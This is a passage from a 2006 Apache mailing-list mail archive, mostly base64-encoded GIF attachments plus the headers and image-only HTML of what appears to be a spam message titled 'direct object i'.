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 KaihijoqqaWaWmVAADs= ------=_NextPart_000_0008_01C6A70F.FE319CCC Content-Type: image/gif; name="fundamental.gif" Content-Transfer-Encoding: base64 Content-ID: <[email protected]> R0lGODdhAwDBAYAAAO/arAAAACwAAAAAAwDBAQACI4SPqcvtD6OctNqLs968+w+G4kiW5omm6sq2 7gvH8kzX9p0VADs= ------=_NextPart_000_0008_01C6A70F.FE319CCC-- From [email protected] Sun Jul 16 15:24:09 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 74608 invoked from network); 16 Jul 2006 15:24:09 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 16 Jul 2006 15:24:09 -0000 Received: (qmail 98229 invoked by uid 500); 16 Jul 2006 15:24:08 -0000 Delivered-To: [email protected] Received: (qmail 98226 invoked by uid 99); 16 Jul 2006 15:24:08 -0000 X-ASF-Spam-Status: No, hits=2.3 required=10.0 tests=EXTRA_MPART_TYPE,HTML_IMAGE_ONLY_16,HTML_MESSAGE,MIME_HTML_MOSTLY,MPART_ALT_DIFF X-Spam-Check-By: apache.org Received-SPF: neutral (hermes.apache.org: local policy) Received: from [161.129.204.104] (HELO ip213040142089.adsl.supanet.net.uk) (161.129.204.104) by apache.org (qpsmtpd/0.29) with SMTP; Sun, 16 Jul 2006 08:24:07 -0700 Received: from yh.dh ([161.129.204.104]) by ip213040142089.adsl.supanet.net.uk (8.13.3/8.13.3) with SMTP id k6GFP6n6024770; Sun, 16 Jul 2006 16:25:06 +0100 Message-ID: <[email protected]> From: "Teddy Strickland" <[email protected]> To: <[email protected]> Subject: direct object i Date: Sun, 16 Jul 2006 16:22:16 +0100 MIME-Version: 1.0 Content-Type: multipart/related; type="multipart/alternative"; boundary="----=_NextPart_000_001B_01C6A8F4.33E0E10E" X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2800.1165 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1165 X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N This is a multi-part message in MIME format. ------=_NextPart_000_001B_01C6A8F4.33E0E10E Content-Type: multipart/alternative; boundary="----=_NextPart_001_001C_01C6A8F4.33E0E119" ------=_NextPart_001_001C_01C6A8F4.33E0E119 Content-Type: text/plain; charset="windows-1252" Content-Transfer-Encoding: quoted-printable ------=_NextPart_001_001C_01C6A8F4.33E0E119 Content-Type: text/html; charset="windows-1252" Content-Transfer-Encoding: quoted-printable <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML><HEAD> <META http-equiv=3DContent-Type content=3D"text/html; = charset=3Dwindows-1252"> <META content=3D"MSHTML 6.00.2800.1165" name=3DGENERATOR> <STYLE></STYLE> </HEAD> <BODY bgColor=3D#ffffff> <DIV><FONT face=3DArial size=3D2><IMG alt=3D"" hspace=3D0=20 src=3D"cid:[email protected]" align=3Dbaseline=20 border=3D0><IMG alt=3D"" hspace=3D0=20 src=3D"cid:[email protected]" align=3Dbaseline=20 border=3D0><IMG alt=3D"" hspace=3D0=20 src=3D"cid:[email protected]" align=3Dbaseline=20 border=3D0><IMG alt=3D"" hspace=3D0=20 src=3D"cid:[email protected]" align=3Dbaseline=20 border=3D0></FONT></DIV> <DIV><FONT face=3DArial size=3D2><IMG alt=3D"" hspace=3D0=20 src=3D"cid:[email protected]" align=3Dbaseline=20 border=3D0><IMG alt=3D"" hspace=3D0=20 src=3D"cid:[email protected]" align=3Dbaseline=20 border=3D0><IMG alt=3D"" hspace=3D0=20 src=3D"cid:[email protected]" align=3Dbaseline=20 border=3D0><IMG alt=3D"" hspace=3D0=20 src=3D"cid:[email protected]" align=3Dbaseline=20 border=3D0></FONT></DIV> <DIV><FONT face=3DArial size=3D2><IMG alt=3D"" hspace=3D0=20 src=3D"cid:[email protected]" align=3Dbaseline=20 border=3D0><IMG alt=3D"" hspace=3D0=20 src=3D"cid:[email protected]" align=3Dbaseline=20 border=3D0></FONT></DIV></BODY></HTML> ------=_NextPart_001_001C_01C6A8F4.33E0E119-- ------=_NextPart_000_001B_01C6A8F4.33E0E10E Content-Type: image/gif; name="projector.gif" Content-Transfer-Encoding: base64 Content-ID: <[email protected]> R0lGODdhEgBmAMYAAMru+oWdtIgwVow9YcDS4pligZCqvoKZsZmzx4kzWaK/0ZWvw73H2cLY55ZY ecPm88nt+ZhcfMXd68DR4Zhff4yluzM9YDdCZHCFnlFhf6jH2Mbp9rLS4myAmsfq9zdEZsTn9K3M 3U9ffbfY5omjucDj8GBzj1BgfnOJoqvK23GGn8Xo9UNRcZGswLLR4TdDZcjs+FlqhxccRE5de6vJ 2iAoTTU/YsDi8Lvd6zA5XSQsUbDP4EZTcxogR5Grv2Byj3qRqUpYdycvVFJhf1Zlg2h7lniOpkdU dL3f7C84XKrI2R4lS8Hk8aPA0neMpX+Wrp+8zgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACwA AAAAEgBmAAAH/oAAgoOEAQIDBIMFhIwABgKLgweNhAgJiYMGlIMKkYMIm6Gio6SlpqeNBAeHCwyK oQ0CDoQNCaEPh4QFAqEQCQODDRG8oQMCEIIFDMSbDgISAA0FvqLOiQUTAMChuwzSgrPcAgzYghSi uxWenpSGiK+hj+yToZaYgpqhnYygqP7/AAMKHEiwoMGDCBMqXMiwocOH+CxInHhBFIaJGEVlkKhh wwMOHUJ5+GDhw4ZBIEKFkCiC0Ih4EjEMghBy00ULJDaUUGDCQqgTGCd+2LSBZFALKDalkHgiYslN BiSqELSChUSbEltkukpJhEQXgzZYpbTiRUkYhKJSWmohBiOxqxDjbpIhY8GgBTJmoKVE1y4AGjVs 3AjVFwCOHDp2iOq7gUePfoRl+PghAwgpukFkCHlwWcYQukSQLa5bhK6RUX09HJHxeLRdJElk6AA7 t64gJUtk2GBS268jukP2yh0u6ADd48dxbDIug4jz54MpMT813VT1UsyRy2gCgDYj5jHChwcbQDpd Sk7My6D0RD0lKOqPyJ9vwIN67TJOE98PEMqAAa4AwIADCEgQCAA7 ------=_NextPart_000_001B_01C6A8F4.33E0E10E Content-Type: image/gif; name="anyhow.gif" Content-Transfer-Encoding: base64 Content-ID: <[email protected]> R0lGODdhJQC0AMYAAMru+pCqvhIWP4qkurPT4wYJM67M3Yylu8js+HSJolNigUdVdZaxxaPB01dn hWByj0BNb8jr+JKtwWR4k8Di8LTU5EhWdsDj8E9ffZSvwjdCZG2Bmx8nTDM9YK7N3n+WrqfF1hcc RLXV5cXo9abE1cnt+QoON4+pvlVkgyQsUcTn9HmQqD1JbDtIarrc6omiuAwQOYCXr1Zlg63M3avJ 2hgeRoGYsKXD1XKHoMfq94WetYWdtHCFnicvVF1vjBogR32VrMbp9neNpnuTqqzL3EpYd0tZeMHk 8VlqhwsPOAcKNDVAYzE6XqnI2RQZQVRjgrnb6Y2mvBAVPSMrUG+DnUxbenqSqis0WGF0kENQcFFh 